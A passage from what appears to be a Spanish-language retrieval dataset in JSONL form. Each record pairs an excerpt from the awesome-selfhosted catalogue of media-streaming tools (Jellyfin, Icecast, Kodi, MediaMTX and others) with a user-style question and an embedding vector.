Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "que programa sirve para crear un sitio web de videos propio como YouTube?", "v": [-0.02307, 0.03014, -0.12845, -0.09944, 0.00336, -0.10444, -0.00737, -0.08251, 0.07476, -0.16427, -0.03632, -0.12644, 0.02704, -0.07785, -0.09518, -0.03549, 0.15835, -0.12086, 0.161, -0.05307, 0.04721, 0.01851, 0.00365, -0.06735, -0.04446, -0.0803, 0.04626, -0.03485, -0.04881, 0.03006, -0.00583, 0.12282, -0.05699, 0.01524, -0.06414, -0.02529, 0.10509, 0.0406, -0.10048, 0.05752, -0.04336, -0.02294, -0.10342, 0.13397, -0.06299, 0.07605, 0.08078, -0.11072, -0.06253, -0.00173, 0.09043, 0.0111, -0.12774, 0.02814, 0.03482, -0.02531, 0.05467, -0.23013, -0.04802, -0.01446, -0.05725, -0.07711, 0.06205, -0.0145, -0.03103, 0.05266, 0.01305, 0.13473, -0.01139, 0.00105, -0.06312, -0.04392, 0.03643, -0.06515, 0.12354, 0.07359, -0.02955, 0.01729, -0.0946, -0.06429, 0.01816, -0.07649, -0.03372, 0.01007, -0.08342, -0.0426, 0.0037, -0.04167, -0.01552, -0.17834, 0.0221, 0.14578, 0.04449, 0.01416, -0.04174, -0.06798, 0.11664, -0.02932, 0.03442, -0.06127, 0.0052, -0.07866, -0.05167, 0.04667, 0.04631, 0.16025, 0.10537, -0.07155, -0.06348, 0.04092, 0.07577, 0.01211, -0.09523, -0.06324, -0.05012, 0.04592, -0.0441, -0.01928, 0.06737, -0.02838, 0.02118, -0.00766, -0.10479, -0.05372, -0.02684, 0.06341, -0.02926, 0.04322, -0.02415, 0.05577, 0.02636, -0.02689, -0.01676, -0.00628, 0.04349, -0.01788, 0.05832, 0.00972, -0.04686, -0.04321, 0.07585, 0.00712, -0.02181, -0.04483, 0.05173, -0.05942, 0.03152, -0.0938, -0.09875, 0.07615, -0.06308, 0.05243, -0.08509, -0.04341, -0.07403, 0.00324, -0.05641, -0.05781, -0.06505, 0.0146, 0.0236, 0.00325, 0.01251, -0.0685, -0.01247, 0.06169, -0.07909, 0.08364, 0.02766, 0.06409, -0.01979, 0.1018, 0.01114, -0.10682, -0.00663, -0.01461, -0.0082, -0.03603, 0.09651, -0.01025, -0.08194, -0.00233, 0.00015, 0.05462, -0.06163, -0.09259, -0.01538, 0.01324, -0.02427, 0.06386, -0.06213, -0.04566, -0.06624, 0.04017, 0.01848, -0.00455, -0.0838, -0.05038, 0.0577, -0.00795, -0.0368, -0.05043, 0.01395, 0.00156, -0.08892, 0.03141, -0.00421, -0.05657, 0.00886, 0.03619, -0.01485, -0.05925, -0.0198, -0.0322, 0.00809, -0.04427, 0.09781, 0.01685, 0.01972, 0.01915, 0.0488, 0.00773, -0.02563, -0.00145, 0.00483, 0.05468, 0.0486, -0.01717, -0.032, 0.01476, -0.05875, -0.10334, -0.06218, -0.07183, 0.05501, -0.00754, 0.03602, 0.02804, -0.04133, -0.00534, -0.02928, 0.05186, -0.03107, -0.02185, 0.00213, -0.06986, -0.07513, 0.04645, 0.04213, -0.05786, -0.02336, 0.01186, 0.03413, 0.02094, -0.00293, 0.03891]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "con que puedo montar una estaciΓ³n de radio online en casa?", "v": [0.03246, 0.05147, -0.05258, -0.14562, -0.2357, 0.00751, -0.03357, 0.05726, -0.07309, -0.06961, -0.05057, -0.09234, 0.1293, -0.0124, 0.12268, 0.03745, 0.0736, 0.11841, 0.03875, 0.006, -0.11223, 0.04219, 0.02789, 0.10427, 0.03593, 0.05679, 0.05734, -0.08357, -0.12808, 0.05715, 0.11922, 0.0457, 0.0031, 0.04884, 0.01987, -0.15127, 0.07619, 0.09991, 0.06793, -0.01603, 0.05483, -0.04213, 0.06614, 0.06016, 0.04106, 0.04819, -0.00469, -0.08198, -0.01328, 0.00639, 0.02379, -0.05523, 0.05456, -0.02723, -0.00771, -0.0292, 0.12124, -0.10607, 0.12897, 0.02721, -0.00485, 0.03228, 0.06519, 0.0273, -0.01636, 0.05531, -0.06208, 0.10206, -0.08912, -0.09601, -0.05657, -0.04562, 0.04136, 0.00778, -0.02943, 0.05207, -0.07928, -0.09979, 0.09744, -0.01118, -0.03117, 0.04436, 0.02691, 0.08062, -0.00282, 0.04424, 0.00862, -0.14822, -0.02516, -0.0249, -0.05551, 0.06859, 0.03071, 0.03115, 0.1062, -0.18935, 0.04482, 0.08989, 0.04066, -0.09379, -0.02142, 0.07629, 0.02549, 0.05384, 0.04575, 0.01784, 0.03731, 0.02133, 0.06125, -0.05492, 0.00701, 0.0062, 0.03068, -0.00776, -0.03614, -0.04423, -0.01198, 0.02476, -0.06309, -0.01241, -0.1221, 0.05274, 0.12662, -0.0108, -0.01972, -0.06242, 0.03767, -0.03845, 0.02341, 0.03184, -0.04934, 0.00763, -0.0277, -0.12009, 0.01778, 0.01086, -0.10365, -0.08219, -0.02806, -0.06235, 0.06565, 0.05387, -0.09506, -0.00464, 0.04232, 0.02964, -0.03965, -0.0125, -0.13198, 0.02848, -0.04258, 0.08755, -0.042, -0.04933, 0.01968, -0.03204, 0.10634, -0.04369, -0.01882, 0.11975, -0.02522, 0.00728, -0.01068, -0.07062, -0.03671, 0.01937, -0.00283, 0.04341, -5e-05, -0.10182, -0.09561, 0.03386, 0.04219, -0.0541, -0.04725, 0.06066, -0.0458, 0.04454, 0.04989, -0.06153, -0.07759, -0.01624, -0.01739, -0.01687, 0.00411, 0.05092, 0.02787, -0.06386, -0.06006, -0.02662, -0.03914, -0.09896, -0.05516, 0.11121, 0.07824, -0.02683, -0.01288, 0.06351, 0.07297, 0.02514, -0.05298, -0.05436, 0.04681, 0.04625, 0.00206, -0.0364, 0.01265, -0.00878, 0.08789, 0.10243, -0.00215, -0.10351, 0.0268, -0.0843, -0.05242, 0.0717, 0.05471, -0.04929, -0.03616, 0.13474, 0.05113, -0.00249, -0.01784, 0.00507, -0.02084, -0.01916, 0.0194, -0.071, 0.09165, 0.04592, -0.03297, -0.05234, 0.04443, 0.01031, -0.00988, -0.06298, 0.04293, 0.04332, -0.05743, 0.01629, -0.01788, 0.06454, 0.02427, 0.04381, 0.01484, -0.05405, 0.02564, 0.05722, 0.00082, 0.0297, -0.02826, -0.01742, 0.03084, -0.01735, 0.05904, 0.03144]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "cual es una alternativa libre a Plex o Jellyfin?", "v": [-0.18707, -0.00562, -0.11107, 0.07761, -0.09045, -0.04594, -0.06894, -0.10726, -0.13313, -0.10823, -0.02286, -0.05229, -0.09135, -0.01934, 0.09663, -0.04147, -0.09701, -0.10377, 0.12045, -0.06992, -0.19678, -0.00482, -0.25737, -0.19102, -0.0854, 0.06308, 0.06886, 0.02664, -0.03684, -0.07165, 0.08497, -0.10028, 0.01416, -0.04886, 0.05122, 0.11993, 0.13297, 0.07871, 0.04373, -0.03049, 0.01866, -0.16085, -0.08472, 0.0834, -0.00678, 0.0892, -0.01767, 0.08169, -0.01414, 0.04119, -0.00518, 0.00589, -0.07657, 0.0607, 0.08242, 0.03977, 0.01673, -0.16663, -0.06299, -0.03779, -0.09306, -0.03495, -0.00721, -0.10199, -0.01604, -0.05876, -0.02637, 0.04777, -0.00399, 0.04909, 0.06034, -0.01388, 0.02779, -0.06041, -0.09166, 0.05362, -0.11436, -0.10049, 0.04175, 0.03466, 0.13938, -0.12946, 0.00647, 0.09671, -0.00295, -0.05207, 0.0475, -0.11029, -0.05741, 0.06123, 0.10401, -0.01272, -0.01115, 0.10784, 0.00133, -0.06386, 0.03402, 0.08906, 0.01601, 0.08797, 0.06941, 0.05666, -0.06882, -0.11472, 0.00618, 0.00143, -0.05841, -0.0124, -0.07974, 0.00953, 0.047, 0.05324, 0.01267, 0.03864, 0.02871, -0.04824, -0.06197, 0.00715, 0.01836, -0.00479, -0.01108, -0.07537, -0.03528, -0.07561, 0.02118, 0.06533, 0.02312, 0.06092, -0.03687, 0.00713, 0.00725, 0.01481, -0.04276, -0.04414, -0.05288, 0.00053, 0.12715, -0.00469, 0.00799, 0.02087, 0.04009, 0.01936, 0.0535, 0.03136, -0.01399, -0.01639, -5e-05, 0.04653, 0.01908, -0.00039, -0.09033, -0.02951, 0.05264, 0.10872, 0.01226, -0.01159, -0.0855, 0.00818, -0.03986, 0.07973, 0.02737, -0.07226, 0.01965, 0.01343, -0.00229, -0.03231, -0.00363, -0.05115, -0.06587, 0.04182, -0.00821, 0.0621, 0.08305, -0.03674, 0.01267, -0.0644, -0.02059, -0.09225, 0.05391, -0.04245, 0.02343, 0.00717, -0.08361, 0.0002, 0.00601, -0.02431, -0.00699, 0.01549, -0.01193, 0.02185, -0.00643, -0.00765, -0.06905, -0.06514, 0.00154, 0.00959, 0.05798, -0.06767, 0.01152, 0.01729, -0.01129, -0.00375, -0.0045, -0.07128, -0.0248, -0.02483, -0.04279, 0.01125, -0.05087, 0.06984, 0.06517, 0.01127, 0.08014, 0.03346, -0.0106, 0.02353, 0.03706, -0.01487, -0.00663, 0.0047, -0.02329, 0.00674, 0.02197, -0.01118, -0.00228, 0.06465, 0.03465, 0.04542, -0.04541, 0.01387, -0.04074, -0.00118, 0.01897, 0.02395, 0.03333, 0.05109, 0.02332, 0.0073, 0.05359, -0.04548, 0.03539, 0.1061, -0.04116, -0.01556, -0.03565, 0.00703, -0.0819, 0.00485, -0.03089, -0.03347, 0.00621, 0.07736, 0.02469, -0.00417, 0.01579, 0.00299]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "con que puedo montar un servidor de karaoke en casa sin instalar programas complejos?", "v": [0.06729, 0.03989, -0.20561, -0.13566, -0.13429, -0.17497, 0.06362, 0.04497, -0.09766, -0.07209, -0.0715, 0.00594, 0.04091, -0.12743, 0.06888, 0.0629, 0.12934, -0.10094, 0.04785, 0.1171, -5e-05, -0.00721, 0.00631, 0.02055, -0.04668, 0.06904, 0.08146, -0.0281, -0.1029, -0.06352, 0.04169, 0.04358, 0.0396, -0.02074, 0.00168, -0.11094, -0.02366, 0.02923, 0.00211, -0.01583, 0.0661, 0.02855, 0.01809, 0.09014, 0.00757, -0.05227, 0.10429, -0.12189, 0.05877, -0.07463, -0.0297, -0.03208, -0.02654, -0.01335, 0.04323, -0.13683, 0.06488, -0.13261, 0.09513, 0.02982, -0.11554, 0.10523, 0.03589, 0.10261, 0.10617, 0.03746, -0.00814, 0.04553, -0.08593, -0.0906, -0.10355, 0.00166, -0.02349, -0.05281, -0.0281, 0.14121, -0.0398, -0.14619, 0.0645, -0.01137, 0.02009, -0.03328, 0.01013, 0.10521, -0.08591, -0.09195, -0.01538, -0.06943, 0.07377, -0.02854, 0.04395, 0.03088, -0.00911, 0.13143, 0.06516, -0.11022, 0.20499, 0.1007, 0.02635, 0.03813, -0.01688, 0.00243, 0.00805, 0.15617, -0.01199, 0.0146, 0.09948, -0.10633, 0.03962, -0.07456, 0.01047, 0.08709, -0.0635, 0.00115, -0.04858, -0.0783, -0.00822, 0.01335, 0.00673, 0.05737, -0.11168, 0.01578, 0.03803, 0.0354, -0.0106, -0.13955, 0.14667, 0.06811, -0.04293, 0.03548, -0.0228, -0.05445, -0.00299, -0.0296, -0.02701, 0.05603, 0.06053, -0.07544, -0.04517, -0.03095, 0.02944, 0.07765, 0.00785, -0.04346, 0.09317, 0.05767, -0.00232, -0.05954, -0.05886, 0.05268, 0.0623, 0.0771, -0.03629, 0.01081, -0.09164, -0.02965, 0.07139, -0.03624, 0.04288, 0.0425, 0.00932, 0.05909, 0.02221, 0.00659, -0.00572, 0.04414, -0.03806, 0.05945, 0.06772, 0.06924, -0.06988, 0.05956, 0.01247, -0.00638, 0.00122, -0.00772, -0.01244, -0.03391, -0.01989, 0.0031, -0.09994, 0.029, 0.01535, -0.03397, -0.06546, -0.00969, -0.03175, -0.00762, -0.0457, -0.06124, -0.00619, -0.00503, -0.08233, 0.04736, 0.03677, -0.03674, -0.0661, -0.03905, 0.01333, -0.03122, -0.06395, -0.03115, 0.00689, -0.01688, 0.06447, 0.0247, -0.02886, 0.06077, 0.02859, 0.07622, 0.00769, -0.04386, 0.04457, -0.01219, -0.0414, -0.01195, 0.01242, -0.02224, 0.05009, 0.05765, 0.01099, 0.00571, 0.02381, -0.03857, 0.00256, -0.02108, 0.01322, 0.009, 0.06012, 0.03542, -0.05206, -0.00688, -0.00902, -0.01509, 0.05982, -0.00496, 0.01293, -0.00655, -0.01342, -0.04155, 0.00509, 0.10205, 0.03714, -0.05689, -0.04548, -0.05989, -0.02375, 0.0206, 0.02636, -0.0497, -0.01147, 0.02226, 0.00867, -0.04057, 0.00961, -0.00484]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "cual es la mejor alternativa libre a Kodi para ver series y pelΓ­culas con transcodificado automΓ‘tico?", "v": [-0.14567, 0.0227, -0.09216, 0.0986, -0.10097, -0.0742, 0.01078, -0.04138, -0.12803, -0.09385, -0.05966, -0.24664, -0.0705, -0.04928, 0.09606, 0.00241, 0.04996, -0.11831, 0.19192, -0.00886, 0.02487, -0.09997, -0.0423, -0.15815, 0.14861, -0.03636, 0.05933, 0.02951, -0.1963, -0.05905, 0.01835, 0.01967, 0.11303, -0.02854, -0.09305, -0.02926, 0.09553, 0.17143, 0.01503, 0.01883, 0.01648, -0.04117, 0.05663, 0.03444, 0.05152, -0.06772, -0.01724, 0.10124, 0.03718, -0.00066, 0.03001, -0.01337, -0.08565, -0.00986, 0.08981, -0.04941, 0.09687, -0.01081, -0.03583, 0.02608, 0.05684, -0.03661, -0.02264, -0.01177, -0.07862, -0.02264, 0.03301, 0.00461, -0.03443, -0.01044, 0.01938, -0.02845, 0.04387, 0.01533, -0.08742, 0.08425, -0.06448, -0.09781, -0.01025, -0.02989, 0.07601, -0.08001, -0.00529, 0.01476, -0.00469, -0.05774, -0.0252, -0.05259, 0.02451, 0.01887, -0.01642, -0.0292, 0.07168, 0.07848, 0.13102, -0.03741, 0.02926, 0.05849, 0.07419, 0.1325, 0.05867, -0.05293, -0.08745, 0.07714, 0.0055, -0.00411, -0.0321, -0.00133, -0.12014, -0.04065, -0.01196, 0.09198, -0.0188, -0.04761, 0.03723, -0.03361, -0.04365, 0.00463, 0.01426, 0.07178, -0.114, 0.04792, 0.01049, -0.10536, 0.06955, 0.01063, 0.05713, -0.04492, -0.05359, 0.01046, 0.01238, -0.05051, -0.13008, -0.19313, -0.03479, -0.11135, 0.13573, 0.06913, 0.00309, -0.01408, 0.04347, 0.00564, 0.05344, 0.04714, 0.02525, -0.04588, -0.00547, -0.06138, 0.00573, 0.00867, -0.09241, 0.0303, 0.07261, 0.04924, -0.01526, 0.06435, -0.01618, -0.05547, 0.00317, 0.07176, 0.06732, -0.112, -0.02066, -0.07173, -0.03951, 0.02881, -0.05916, -0.00708, -0.02304, -0.02872, 0.06321, 0.07364, 0.01447, -0.04262, 0.00653, -0.07279, -0.0103, -0.04573, 0.04312, -0.00104, -0.01027, -0.00372, -0.05391, -0.01299, 0.05414, -0.09895, -0.03625, -0.04537, 0.04047, -0.02363, 0.00099, 0.04897, -0.07144, -0.08028, 0.00753, -0.02868, -0.04984, -0.03323, 0.03338, -0.02253, -0.08016, -0.04966, 0.00182, -0.03005, -0.03814, 0.04781, -0.02375, 0.06474, -0.03479, 0.10326, -0.02002, 0.03734, 0.06678, -0.02468, -0.12886, -0.00063, -0.06477, 0.00046, -0.02362, 0.00388, 0.0431, -0.02123, 0.00543, -0.03597, -0.03679, -0.00032, 0.0267, 0.01157, -0.03974, -0.04604, -0.02436, 0.07229, 0.01039, -0.02423, 0.02023, 0.04894, -0.01533, -0.00063, 0.00312, -0.03437, 0.05161, 0.04083, -0.00678, -0.0185, -0.03836, 0.0369, -0.05901, 0.03982, -0.04942, -0.04141, -0.02507, 0.06527, -0.02769, 0.00886, 0.03214, 0.03523]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "que herramienta me sirve para transmitir video desde mi mΓ³vil a mis dispositivos en tiempo real?", "v": [-0.0576, 0.15268, -0.13188, -0.16197, -0.01474, -0.06699, -0.18705, 0.0295, 0.05987, -0.07982, -0.00117, -0.11035, 0.08582, -0.04765, 0.09436, -0.00015, 0.10116, -0.07332, 0.05432, -0.03413, 0.07521, 0.01077, -0.11116, -0.08141, -0.0303, 0.10678, 0.09954, 0.00955, -0.24255, -0.04621, 0.02926, -0.00639, 0.03035, -0.04791, -0.11038, -0.14066, 0.00025, 0.09668, -0.09736, 0.01798, 0.00829, 0.03345, 0.00443, 0.022, 0.06079, -0.07156, 0.0024, -0.05377, -0.09234, 0.13559, -0.05838, -0.02536, -0.11085, 0.07314, -0.12663, -0.15074, 0.16326, -0.20207, 0.10418, -0.098, -0.04442, -0.09711, -0.06693, -0.03958, 0.06523, 0.02405, 0.00764, 0.04277, -0.13282, -0.02251, -0.04158, -0.00797, 0.06904, 0.03145, -0.02081, 0.01503, -0.11907, 0.0043, 0.01664, -0.00014, 0.08142, -0.04071, -0.01266, 0.02576, -0.00131, 0.04866, 0.09312, 0.01681, 0.0241, -0.11455, -0.03003, 0.10647, 0.02114, -0.04629, -0.01171, -0.00841, 0.01299, -0.05669, 0.02622, -0.01417, 0.14884, -0.05433, -0.09738, 0.02457, -0.0188, 0.00846, 0.03011, -0.06933, -0.04907, -0.04127, 0.01118, -0.02142, -0.0163, -0.00918, 0.02696, 0.07689, 0.01533, -0.08916, -0.07408, 0.01152, 0.01586, -0.01149, 0.01188, -0.05829, 0.07446, 0.05047, -0.06729, -0.02837, -0.01132, 0.01226, 0.05852, -0.07198, -0.01425, -0.0065, 0.01554, -0.07052, 0.06196, -0.01855, 0.01675, -0.0487, 0.05385, 0.0689, -0.07572, -0.09344, 0.00011, 0.03878, 0.01905, -0.01477, -0.00972, -0.00965, -0.00042, -0.03996, -0.04766, -0.01679, -0.01589, 0.01629, 0.00033, -0.03465, -0.13463, 0.06564, 0.01358, -0.02459, 0.00194, -0.08149, -0.04321, -0.06569, 0.00432, 0.07832, 0.1082, 0.02703, 0.02044, 0.01691, 0.12035, -0.03428, -0.0565, -0.00156, 0.0317, 0.04877, -0.02091, -0.10334, -0.01789, 0.0496, 0.01982, 0.02186, 0.06663, -0.0146, -0.01985, 0.01688, -0.04563, 0.01521, 0.01821, 0.01441, 0.06653, 0.02897, 0.03373, -0.02492, -0.0567, -0.07384, -0.00061, 0.03602, -0.0332, -0.0715, 0.02196, 0.03463, 0.00691, 0.03823, 0.00685, 0.01132, 0.01261, 0.03504, 0.01282, 0.04037, 0.03444, 0.01238, -0.01133, -0.01812, 0.06019, 0.05681, -0.06187, -0.00195, 0.07091, -0.03106, 0.00441, -0.03365, -0.0648, 0.105, -0.00891, 0.01533, -0.04672, -0.11573, 0.00252, -0.02098, 0.0016, -0.00138, 0.00391, -0.03216, 0.03804, -0.01641, -0.06208, -0.03484, -0.04766, 0.04762, 0.02999, 0.02038, -0.08424, -0.01277, -0.05284, -0.01453, -0.03919, -0.09358, -0.00534, 0.01229, 0.08193, 0.01071, 0.00187, 0.00608]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "ΒΏQuΓ© programa sirve para transmitir audio y video desde un ordenador Linux como si fuera una TV o altavoces?", "v": [0.01476, 0.09256, -0.01699, -0.1528, -0.01417, -0.13535, -0.10746, -0.00439, 0.08015, -0.06202, -0.01243, -0.13589, -0.03469, 0.0261, 0.05711, -0.02688, 0.09689, -0.06513, 0.10386, 0.00094, 0.05472, 0.0777, -0.11071, -0.07619, 0.10691, 0.05757, 0.08776, -0.0029, -0.00302, 0.01825, -0.04041, 0.0271, -0.01112, -0.03584, -0.01711, -0.04247, 0.01897, 0.07696, 0.04911, 0.16291, 0.05357, -0.02811, 0.05449, 0.00865, 0.04305, -0.09739, 0.0489, -0.05599, 0.07198, -0.04173, 0.02166, -0.02418, 0.02996, 0.01487, 0.03782, -0.1043, 0.01983, -0.1827, 0.05007, -0.076, -0.04587, -0.03928, 0.04037, -0.0981, 0.02582, 0.11117, -0.04639, 0.01068, -0.07408, 0.02506, -0.12531, 0.03465, 0.03538, 0.0567, -0.02497, 0.05749, -0.18388, -0.0878, 0.10701, -0.06965, 0.03633, -0.06967, 0.0692, 0.01732, -0.11642, -0.0221, 0.06068, 0.02369, -0.08709, -0.04104, -0.02827, 0.13632, 0.04485, 0.01271, 0.12987, -0.03292, 0.14951, 0.05009, -0.02657, -0.04663, 0.03195, 0.00886, -0.0866, 0.12832, -0.02072, 0.09221, 0.08379, -0.17664, -0.02095, -0.06294, 0.02431, 0.07728, 0.00525, -0.0489, -0.10517, -0.03365, 0.03088, -0.0299, -0.02664, 0.09403, -0.07291, 0.07946, 0.0182, 0.03403, -0.04026, -0.00666, -0.00288, 0.04577, -0.05209, 0.05489, 0.06887, -0.06462, 0.093, -0.09385, 0.01666, -0.09717, 0.02388, -0.05921, -0.01928, -0.08429, 0.07859, 0.09806, 0.01308, -0.00455, 0.06908, -0.02064, 0.03147, -0.05666, -0.05672, -0.00253, -0.00658, 0.0368, -0.07895, -0.04903, -0.02156, 0.00758, 0.07172, -0.00108, -0.11038, 0.03416, -0.00589, 0.00918, 0.027, -0.07487, 0.04403, -0.01766, -0.07199, 0.04315, 0.06852, 0.03713, -0.06191, 0.03453, 0.05158, -0.10971, -0.10349, -0.04636, 0.00314, -0.03381, 0.03255, -0.00715, -0.08262, 0.1076, 0.05161, 0.0381, 0.04134, 0.01031, -0.03081, -0.03663, -0.09272, -0.06218, 0.00554, 0.01567, -0.02914, -0.02288, 0.04879, -0.03237, -0.14399, -0.05183, -0.04376, 0.07062, -0.13331, -0.02147, 0.0058, -0.01919, 0.03815, 0.05362, -0.02973, -0.00957, 0.02707, 0.15263, -0.02629, 0.00284, 0.00864, 0.03831, -0.01563, -0.0076, 0.04156, 0.08428, 0.01354, 0.06852, 0.05499, -0.0077, 0.06958, -0.03066, -0.00781, -0.04022, 0.03633, -0.02226, 0.00858, -0.03391, -0.01955, -0.02814, 0.00543, 0.02286, -0.02375, 0.01064, -0.02464, 0.03008, -0.02706, -0.01538, -0.06137, 0.07334, -0.03931, -0.05328, -0.0256, -0.01266, -0.04989, 0.03437, 0.00897, -0.05536, -0.0328, -0.01042, -0.00017, 0.0168, 0.0197, 0.02869]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” 